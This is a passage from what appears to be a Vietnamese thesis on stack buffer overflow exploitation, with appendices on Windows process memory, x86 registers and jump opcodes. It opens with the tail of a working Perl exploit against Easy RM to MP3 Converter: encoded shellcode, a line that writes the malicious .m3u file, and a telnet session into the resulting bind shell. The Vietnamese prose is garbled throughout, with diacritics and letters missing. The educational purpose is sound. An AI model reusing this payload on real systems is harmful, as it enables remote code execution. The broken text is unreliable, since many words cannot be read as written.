.\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e .\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50 .\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50 .\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a .\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50 .\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45 .\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50 .\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b .\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47 .\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42 .\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b .\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49 .\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42 .\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48 .\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b .\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48 .\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b .\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c .\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48 .\x50\x41\x41;open($FILE,>$file);print $FILE $junk.$eip.$shellcode;close($FILE);print m3u File Created successfully\n;To file m3u v m, Easy RM to MP3s b treo:Gi ta ch vic Telnet n port 4444root@bt:/# telnet 192.168.0.197 4444Trying 192.168.0.197Connected to 192.168.0.197.Escape characteris^].Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\Program Files\Easy RM to MP3 Converter>Kt lun chng IIIChng III trnh by cc cch tm li bo mt phn mm ca lp trnh vin, ngi kim th, v quan trng nht l cch thc tm li ca hacker. Chng ny ch yu trnh by cch m hacker tm ra li trn b m trn stack. Vic xc nh xem mt phn mm c b li hay khng l iu rt quan trngTrong chng ny chng ta cng i tm hiu cc bc khai thc thnh cng li trn b m trn stack. Vic quan trng nht khai thc thnh cng mt li trn b m trn stack l vic lm th no nhy ti shellcode. iu ny c trnh by mt cch chi tit trong chng ny. nhy ti shellcode ta c rt nhiu cch, v ty vo trng hp c th m ta s dng cch tt nht thc hin. XUT QU TRNH PHT TRIN PHN MM AN TONT vic nghin cu v l hng bo mt phn mm, chng ta nhn thy vic m bo cho phn mm c an ton l v cng quan trng. m bo cho mt sn phm phn mm c an ton th nhng iu sau y l khng th thiu: m bo phn mm an ton ngay t khu thit k. Nu m bo an ton ngay t khu thit k s trnh c nhng ri ro rt ln v li bo mt phn mm trong qu trnh trin khai. Phn mm trong qu trnh pht trin c m bo an ton t bn thit k. iu ny gip vic m bo an ton cho sn phm phn mm tt hn. Tun theo qui trnh pht trin phn mm nghim ngt, y ng bc. iu ny s trnh sai phm m ngi pht trin c th gp phi khi thit k. S dng mu thit k an ton. y l cch m cc nh pht trin lun lun chn la. Cc mu thit k an ton c kim nghim v nh gi, khi s dng chng s trnh nguy c pht sinh li bo mt phn mm. C i ng lp trnh vin nhiu kinh nghim. Mt yu t then cht l phi c i ng lp trnh vin c kinh nghim trong lnh vc pht trin phn mm. H l nhng ngi trc tip vit ra cc sn phm phn mm. Do h ng vai tr quan trng trong vic m bo an ton cho sn phm phn mm. Thc hin kim th phn mm. y l khu bt buc v khng th thiu c nu mun sn phm l an ton. Thu Hacker tn cng th nghim phn mm tm kim li. Xu hng ca cc nh pht trin hin nay l vic thu cc hacker gii th tn cng sn phm ca ho. T h c th pht hin c nhng li m h khng ng ti.KT LUN V NH HNG PHT TRINKhai thc li bo mt phn mm l mt cng vic tng i kh khn v phc tp.Vic nm vng v nghin cu k tt c cc vn i hi nhiu thi gian v cng sc. Qua mt thi gian nghin cu v tm hiu, ti ca em hon thnh. Cc ni dung chnh m ti thc hin c l:1) Tm hiu tng quan v phn mm.2) Tm hiu v cc qui trnh pht trin mt sn phm phn mm.3) Tm hiu v li phn mm, li bo mt phn mm v mt s li bo mt phn mm ph bin.4) Tm hiu cc cch m lp trnh vin, ngi kim th v hacker pht hin ra li bo mt phn mm.5) Phn tch chi tit li trn b m trn stack, cch thc tm ra li ny v cc bc khai thc thnh cng li ny.6) Tm hiu cc cch m hacker s dng nhy n shellcode.7) Khai thc th nghim li trn b m trn stack thnh cngHng pht trin ca ti l m rng nghin cu li trn b m trn stack vi trng hp kh hn l khng c on b nh no lu tr shellcode cn phi chia nh shellcode lu trn cc phn on b nh nh. M rng nghin cu k thut nhy ti shellcode SHE. M rng nghin cu cc li khc nh li trn b m trn heap, li double free, li use after free cng nh cch tm v khai thc cc li ny.TI LIU THAM KHO[1]. Stack Based Overflows Corelan Teamhttps://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/[2]. Stack Based Overflows jumping to shellcode Corelan Teamhttps://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/[3]. Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness (2007)Gray Hat Hacking: The Ethical Hackers Handbook Second Edition[4]. Greg Hoglund and Gary McGraw (2004)Exploiting Software: How to Break Code[5]. Gary McGraw (2006)Software Security: Building Security In[6]. Hc vin K thut Mt m (2006)Gio trnh Cng ngh phn mm[7]. Buffer Overflowhttp://www.ksyash.com/2011/01/buffer-overflow-2/[8]. Double Freehttps://www.owasp.org/index.php/Double_Free[9]. Avoiding Buffer Overflows And Underflowshttps://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide/Articles/BufferOverflows.html[10].http://samate.nist.gov/SRD/view.phpPH LC1. 1.PH LC 1: CHNG TRNH KHI NP TRONG B NHKhi nhng tin trnh c np n b nh, chng chia thnh 6phn on nh sau:1.1.Phn on .textPhn on ny tng ng l phn ca file thc thi nh phn. N cha cc ch th lnh (m my) thc hin cc tc v ca chng trnh. Phn on ny c nh du l ch c v s gy ra li nu nh ghi trn phn on ny. Kch thc l c nh ti lc thc thi khi tin trnh ln u tin c np.1.2.Phn on .dataL phn on c s dng lu tr cc bin ton cc v c khi to gi tr ban u nh l : int a=0 ; Kch thc ny cng c nh ti lc thc thi chng trnh.1.3.Phn on .bssBelow stack section (.bss) l c s dng lu tr cc bin ton cc nhng khng c khi to gi tr ban u nh l : int a;Kch thc ca phn on ny cng c nh lc thc thi chng trnh.1.4.Phn on HeapPhn on ny c s dng cp pht cc bin ng v pht trin t vng a ch thp n vng a ch cao trong b nh. Trong ngn ng C th vic cp pht v gii phng c thc hin qua hai hm malloc() v free(). V d : int i = malloc(sizeof (int));1.5.Phn on StackPhn on stack c tc dng gi nhng li gi hm trong th tc quy v pht trin theo a ch vng nh cao n a ch vng nh thp trn hu ht cc h thng.1.6.Phn on bin mi trng v i sPhn on ny lu tr mt bn sao chp cc bin cp h thng m c th c yu cu bi tin trnh trung qu trnh thc thi. Phn on ny c kh nng ghi c.1. 2.PH LC 2: THE PROCESS MEMORYMi ng dng Windows s dng cc phn ca b nh. Trong gm 3 thnh phn chnh l: Code segment: m lnh hng dn b x l thc thi. (EIP tr n m lnh s c thc thi tip theo) Data segment: bin varible, dynamic buffer Stack segment: c s dng truyn data ( d liu) tham s ( agrument) vo trong hm, v c s dng nh l mt ni lu tr bin. Stack bt u ( y stack) ti v tr kt thc ( very end) ca trang b nh o ( virtual memory) v gim dn. Lnh PUSH thm vo nh stack, POP th ly n ra ( 4bytes) v chuyn vo thanh ghi.Nu mun truy cp stack trc tip, c th s dng thanh ghi ESP (Stack Pointer). Thanh ghi ny lun tr vo nh stack a ch thp nht ca stack.Sau khi PUSH, ESP s tr n a ch thp hn ( a ch s c gim bng size ca d liu c push vo stack thng l 4 bytes vi a ch / thanh ghi) Vic gim a ch thng c thc hin trc khi t d liu vo stack ( ty thuc vo qu trnh thc hin nu ESP ch vo v tr tip theo trong stack, vic gim s tin hnh sau khi t d liu vo stack)Sau khi POP, ESP tr n a ch cao hn ( a ch c tng, thng l 4bytes). Vic tng a ch xy ra khi sau khi g b thnh phn ra khi stack.Khi mt hm / chng trnh con bt u, mt frame stack c to ra. Frame ny s lu cc thng s ca th tc trc v c s dng chuyn tham s cho chng trnh con. V tr hin ti ca con tr c th truy cp qua ESP stack pointer. C s bt u ca hm hin ti c cha trong thanh ghi c s base pointer (EBP) hoc frame pointer.2.1.Cc thanh ghi ph bin (Intel, x86) EAX accumulator: c s dng cho vic tnh ton, lu tr d liu ( trong function call chng hn). S dng trong cc ton t c bn nh add, subtract, compare. EBX base: ( khng c bt k iu g cn lm vi thanh ghi c s) khng c mc ch chnh xc v c s dng lu d liu. ECX counter: c s dng lp ECX gim dn. EDX data : thanh ghi m rng ca EAX. Cho php cc tnh ton phc tp hn ( multiply divde) bng cch cho php m rng lu tr d liu to iu kin cho tnh ton ( nh lu thng s vo EAX, phn d vo EDX chng hn) ESP : stack pointer : tr n nh stack. EBP : base pointer : di so vi nh stack. ESI source index : lu gi v tr ca input data. EDI destination index : ch n v tr kt qu ca ton t c lu tr. EIP : instruction pointer : tr n lnh k tip c thc hin2.2.Process MemoryKhi ng dng bt u trong mi trng Win32, tin trnh c to v b nh o (virtual memory) c gn. Vi tin trnh 32 bit, a ch bt u t 000000000 n 0xFFFFFFFF. Trong t 000000000 n 0x7FFFFFFF c gn cho user-land, cn t 080000000 n 0xFFFFFFFF c gn cho kernel-land. Windows s dng flat memory model iu c ngha CPU c th trc tip / tun t / tuyn tnh a ch tt c v tr a ch c sn m khng cn phi s dng phn on phn trang.B nh Kernel land ch c truy cp bi OSKhi tin trnh c to , PEB (Process Execution Block) v TEB (Thread Environment Block) cng c to.PEB bao gm tt c user land parameters ( tham s ca user land) gn vi tin trnh hin ti: V tr ca main excute Tr n loader data ( s dng hin th tt c dll / module c load trong tin trnh) Tr n thng tin v heapTEB m t trng thi ca tin trnh, bao gm: V tr ca PEB trong b nh V tr ca stack trong tin trnh m n s hu Tr n entry u tin ca SEH chainMi lung (thread) bn trong tin trnh (process) c mt TEB.Hnh ph lc:S b nh trong tin trnh ca Win32Phn on text ( text segment) trong program image l read-only, v ch bao gm application code. iu ny hn ch sa i application code. Data segment c s dng lu tr bin ton cc (global) v bin tnh (static). Data segment c s dng khi to global variables, strings, constants.Data segment c kh nng ghi v c size c nh. Heap segment c s dng cho cc phn cn li ca program variables. N c th pht trin ln hn hoc nh hn thit k.Tt c b nh trong heap c qun l bi thut ton cp pht v thut ton thu hi. Mt vng nh c dnh ring bi thut ton. Heap s pht trin a ch ln cao hn.Trong dll, cc m, u vo (danh sch cc hm c s dng bi dll hoc dll khc v ng dng), u ra l mt phn ca .text segment.1. 3.PH LC 3C,C++,Perl: y l cc ngn ng lp trnh bc cao.Readme: Thng l tn mt tp vn bn nm trong a ci t ca cc chng trnh ng dng, cha cc thng tin pht cht, khng c trong cc bn thuyt minh s dng ca chng trnh . Tn gi in hnh ca tp.instance methods: Phng thc hng i tng, s dng trong ngn ng lp trnh hng i tng.thread: lung (lung b x l)Disassembly: L mt chng trnh my tnh c nhim v dch t ngn ng my (machine language) sang ngn ng lp trnh bc thp assembly.Debugger: L mt chng trnh my tnh c s dng kim tra v pht hin li ca cc chng trnh my tnh khc.NOP(No Operation Performed) : gp lnh ny chng trnh s chy qua m khng thc hin bt k hnh ng no.Opcode(operation code): l thut ng dng ch cc loi m c vit di dng cc ngn ng my, n c tc dng hng dn cho my cc thao tc cn phi thc hin. Cu trc opcode ty thuc vo tng loi my v ngn ng m b x l m my c th nhn bit.Payload: L phn d liu chnh. y Payload l phn shellcode m metasploit cung cp.RET: y l mt lnh ca ngn ng lp trnh assembly, n c tc dng cng 4 bytes vo ESP.Devcpp: y l mt chng trnh my tnh h tr vic vit v bin dch ngn ng lp trnh C/C++.1. 4.PH LC 4: BNG OPCODE CA CC LNH NHY V CCodeMnemonicDescription
77 cbJA rel8Jump short if above (CF=0 and ZF=0)
73 cbJAE rel8Jump short if above or equal (CF=0)
72 cbJB rel8Jump short if below (CF=1)
76 cbJBE rel8Jump short if below or equal (CF=1 or ZF=1)
72 cbJC rel8Jump short if carry (CF=1)
E3 cbJCXZ rel8Jump short if CX register is 0
E3 cbJECXZ rel8Jump short if ECX register is 0
74 cbJE rel8Jump short if equal (ZF=1)
7F cbJG rel8Jump short if greater (ZF=0 and SF=OF)
7D cbJGE rel8Jump short if greater or equal (SF=OF)
7C cbJL rel8Jump short if less (SFOF)
7E cbJLE rel8Jump short if less or equal (ZF=1 or SFOF)
76 cbJNA rel8Jump short if not above (CF=1 or ZF=1)
72 cbJNAE rel8Jump short if not above or equal (CF=1)
73 cbJNB rel8Jump short if not below (CF=0)
77 cbJNBE rel8Jump short if not below or equal (CF=0 and ZF=0)
73 cbJNC rel8Jump short if not carry (CF=0)
75 cbJNE rel8Jump short if not equal (ZF=0)
7E cbJNG rel8Jump short if not greater (ZF=1 or SFOF)
7C cbJNGE rel8Jump short if not greater or equal (SFOF)
7D cbJNL rel8Jump short if not less (SF=OF)
7F cbJNLE rel8Jump short if not less or equal (ZF=0 and SF=OF)
71 cbJNO rel8Jump short if not overflow (OF=0)
7B cbJNP rel8Jump short if not parity (PF=0)
79 cbJNS rel8Jump short if not sign (SF=0)
75 cbJNZ rel8Jump short if not zero (ZF=0)
70 cbJO rel8Jump short if overflow (OF=1)
7A cbJP rel8Jump short if parity (PF=1)
7A cbJPE rel8Jump short if parity even (PF=1)
7B cbJPO rel8Jump short if parity odd (PF=0)
78 cbJS rel8Jump short if sign (SF=1)
74 cbJZ rel8Jump short if zero (ZF = 1)
0F 87 cw/cdJA rel16/32Jump near if above (CF=0 and ZF=0)
0F 83 cw/cdJAE rel16/32Jump near if above or equal (CF=0)
0F 82 cw/cdJB rel16/32Jump near if below (CF=1)
0F 86 cw/cdJBE rel16/32Jump near if below or equal (CF=1 or ZF=1)
0F 82 cw/cdJC rel16/32Jump near if carry (CF=1)
0F 84 cw/cdJE rel16/32Jump near if equal (ZF=1)
0F 84 cw/cdJZ rel16/32Jump near if 0 (ZF=1)
0F 8F cw/cdJG rel16/32Jump near if greater (ZF=0 and SF=OF)
0F 8D cw/cdJGE rel16/32Jump near if greater or equal (SF=OF)
0F 8C cw/cdJL rel16/32Jump near if less (SFOF)
0F 8E cw/cdJLE rel16/32Jump near if less or equal (ZF=1 or SFOF)
0F 86 cw/cdJNA rel16/32Jump near if not above (CF=1 or ZF=1)
0F 82 cw/cdJNAE rel16/32Jump near if not above or equal (CF=1)
0F 83 cw/cdJNB rel16/32Jump near if not below (CF=0)
0F 87 cw/cdJNBE rel16/32Jump near if not below or equal (CF=0 and ZF=0)
0F 83 cw/cdJNC rel16/32Jump near if not carry (CF=0)
0F 85